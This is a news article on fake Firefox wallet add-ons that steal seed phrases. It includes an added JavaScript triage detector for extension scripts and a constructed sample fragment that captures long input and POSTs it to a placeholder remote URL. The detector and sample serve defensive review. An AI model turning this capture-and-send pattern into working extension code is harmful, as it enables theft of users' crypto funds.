Researchers have discovered dozens of fake wallet Firefox add-ons that are stealing sensitive credentials.

Dozens of fake wallet add-ons have recently flooded the official Firefox add-ons store, targeting cryptocurrency users by impersonating popular wallet brands and stealing sensitive credentials. Over 40 malicious extensions were discovered, posing as legitimate wallets from well-known providers such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero.

Key details about the campaign

Malicious Code & Data Theft: These fake extensions contain code that captures wallet credentials and seed phrases. Specifically, they monitor for input fields where users might enter sensitive information, filtering for strings longer than 30 characters—typical of wallet keys or mnemonic phrases. Once detected, the data is sent to servers controlled by attackers. The extensions are often clones of open-source versions of real wallets, but with added malicious logic. They also use tricks such as hiding error dialogs by setting their opacity to zero, preventing users from noticing suspicious activity.
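The behaviours described above can be turned into a static triage check for reviewers looking at an unpacked extension's scripts. The following is an added example, not code from the article, Koi Security or Mozilla; the rule names, the threshold of 30, the escalation logic and both sample fragments are assumptions constructed for illustration.

```javascript
// Added example: static triage heuristics for extension source text.
// Each rule mirrors one behaviour the article describes; names are hypothetical.
const RULES = [
  // Listener on form-field events (where a seed phrase would be typed or pasted).
  { id: "input-hook",
    test: (s) => /addEventListener\(\s*["'](input|change|keyup|paste)["']/.test(s) },
  // Length comparison against a threshold of 30 or more characters.
  { id: "long-string-filter",
    test: (s) => [...s.matchAll(/\.length\s*>=?\s*(\d+)/g)]
      .some((m) => Number(m[1]) >= 30) },
  // Any outbound network call from the same script.
  { id: "network-sink",
    test: (s) => /\b(fetch|sendBeacon)\s*\(|new\s+XMLHttpRequest\b/.test(s) },
  // Element made invisible by setting opacity to exactly zero.
  { id: "hidden-dialog",
    test: (s) => /opacity\s*[:=]\s*["']?0(?![.\d])/.test(s) },
];

// The three rules that together form the capture-filter-send chain.
const CORE = ["input-hook", "long-string-filter", "network-sink"];

function triage(source) {
  const hits = RULES.filter((r) => r.test(source)).map((r) => r.id);
  const escalate = CORE.every((id) => hits.includes(id));
  return { hits, verdict: escalate ? "manual-review" : "no-match" };
}

// Constructed, non-functional fragments (undefined names on purpose).
const SAMPLE_FLAGGED = [
  'field.addEventListener("input", onInput);',
  'if (text.length > 30) { queue.push(text); }',
  'fetch(REMOTE_URL, { method: "POST", body: JSON.stringify(queue) });',
  'dialog.style.opacity = "0";',
].join("\n");

// Constructed benign form code: short threshold, partial opacity, no network.
const SAMPLE_BENIGN = [
  'form.addEventListener("change", validate);',
  'if (password.length >= 8) { submit.disabled = false; }',
  'hint.style.opacity = "0.5";',
].join("\n");

console.log(triage(SAMPLE_FLAGGED));
console.log(triage(SAMPLE_BENIGN));
```

A match only prioritises a script for human review: legitimate wallets also read input fields and make network calls, so the destination of the request still has to be checked by hand.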

Security researchers at Koi Security, who uncovered the campaign, found evidence suggesting the operation is run by a Russian-speaking threat group. Seed phrases are especially valuable because they allow full access to a user’s crypto wallet and can be used to transfer or drain funds instantly. Stolen assets are almost always unrecoverable.

Mozilla’s Response

Mozilla has implemented new security measures, including an automated risk profiling system and manual reviews, to detect and block malicious wallet extensions more quickly. However, the rapid appearance of dozens of these fake add-ons highlights the ongoing challenge and the need for users to remain vigilant.

User Recommendations

• Only install wallet extensions from official sources or the official website of the wallet provider.
• Double-check the legitimacy of any crypto-related extension, even if it appears in the official Firefox store.
• Be cautious of any extension requesting sensitive information such as seed phrases or private keys.